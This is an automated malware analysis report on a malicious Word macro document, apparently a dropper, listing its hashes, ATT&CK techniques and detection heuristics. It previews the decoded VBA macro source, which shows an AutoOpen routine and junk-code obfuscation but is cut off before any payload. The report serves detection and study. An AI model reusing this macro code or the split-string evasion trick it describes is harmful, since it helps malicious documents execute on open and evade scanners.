Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ee2bbe2398be8a17…

MALICIOUS

Office (OLE)

173.8 KB Created: 2019-05-09 17:45:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 8e1ebbdab494535c3f85291758b46be9 SHA-1: f3c725f0c54db44aed79b7d8c49f5943aeb3cc97 SHA-256: ee2bbe2398be8a1732c0afc318b797f192ce898982bff1b109005615588facb0
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the use of Visual Basic for Applications to execute commands via WMI. The presence of an AutoOpen macro and split keyword obfuscation further supports this. The script's intent is to leverage WMI to create a process, likely to download and execute a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6966214-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6966214-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43022 bytes
SHA-256: e12fb608bc143b8ad92b0e67effe601ac2b3c41d4fb766edfbd2fecf5887b39b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "B6108955"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "F15429"
Attribute VB_Base = "0{F7AEC335-83AB-407F-BE00-CC619A70DC49}{CD4CF7E8-CE66-4EF7-A1BA-E559BB585E7E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F3_952"

Attribute VB_Name = "J0536822"

Attribute VB_Name = "N7788748"

Attribute VB_Name = "Z27_83"

Attribute VB_Name = "s9203027"

Attribute VB_Name = "b52_6831"

Attribute VB_Name = "Q825387"

Attribute VB_Name = "i3_6595"

Attribute VB_Name = "q6_83_"
Attribute VB_Base = "0{31E9B1DF-5E8A-4D2E-93FE-DC6493918584}{366CD540-B076-4538-AC65-03CCE723149F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "j21_30"
Function c81166_(o30396)
         While G7229771 And O137677
Select Case w8_162_8
         Case n64__341
            B3680669 = Log(c435613)
            z0_6250 = 980366862
            T36910 = Int(N3_823 + CLng(U406_19))
         Case u2943_65
            H17279 = L8488901
            d45520 = Cos(153269693)
            q1463827 = CStr(330858079)
End Select
      Wend
         While B128743 And B_071_50
Select Case E60910
         Case d1313459
            G9184_ = Log(G6461_09)
            I319678_ = 642431198
            f2483993 = Int(t62976 + CLng(P26357_2))
         Case b_5443
            z902268 = n_1017
            q359981 = Cos(478042632)
            W9630337 = CStr(251490308)
End Select
      Wend
Set c81166_ = CVar(o30396)
         While b8359_1 And k9469816
Select Case J939291
         Case l95266
            f0441981 = Log(G752_062)
            v18899 = 808506213
            d910_5 = Int(O2_791 + CLng(j9707758))
         Case d2863_89
            F86848 = u8218021
            n_5532 = Cos(884622483)
            m0_0_6_ = CStr(781093032)
End Select
      Wend
         While G54560 And l0349_
Select Case P24017
         Case f542841_
            V860278 = Log(N_1716)
            N77166 = 354024360
            c66504 = Int(d875183 + CLng(i_60474))
         Case T04_2221
            O85833 = o03059_0
            M3_242 = Cos(938899852)
            i763_8 = CStr(59754062)
End Select
      Wend
         While o0492618 And a4_218
Select Case z69525
         Case I861905
            j892_4 = Log(I2_4097_)
            Z_580274 = 375098906
            V8021514 = Int(K65138 + CLng(s_16__))
         Case z9877_2
            a2395683 = a18765
            M8_8_45 = Cos(394165218)
            Y644239 = CStr(594074891)
End Select
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While r6_73526 And P429_88
Select Case a17584
         Case F_73156_
            W833845 = Log(W887_5)
            s41347 = 666925634
            h530895 = Int(N_4431 + CLng(G15470))
         Case f86522
            H8_139 = d821_71
            F6873173 = Cos(739516046)
            t82251 = CStr(162195872)
End Select
      Wend
         While r98693 And U9448252
Select Case Q16756_
         Case A055252
            n75416 = Log(w35410)
            K68342 = 615491629
            c1143065 = Int(P2__103 + CLng(M1__240))
         Case Y_7_366
            o840__6_ = a8417_
            j2_14___ = Cos(211022618)
            u56636 = CStr(859381382)
End Select
      Wend
Call P255599
         While c4646973 And S9964348
Select Case u803799
         Case o52490
            d6_29_7 = Log(A7371070)
            V4881110 = 278893779
            B7_7933 = Int(i38992 + CLng(o7658__))
         Case o028
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.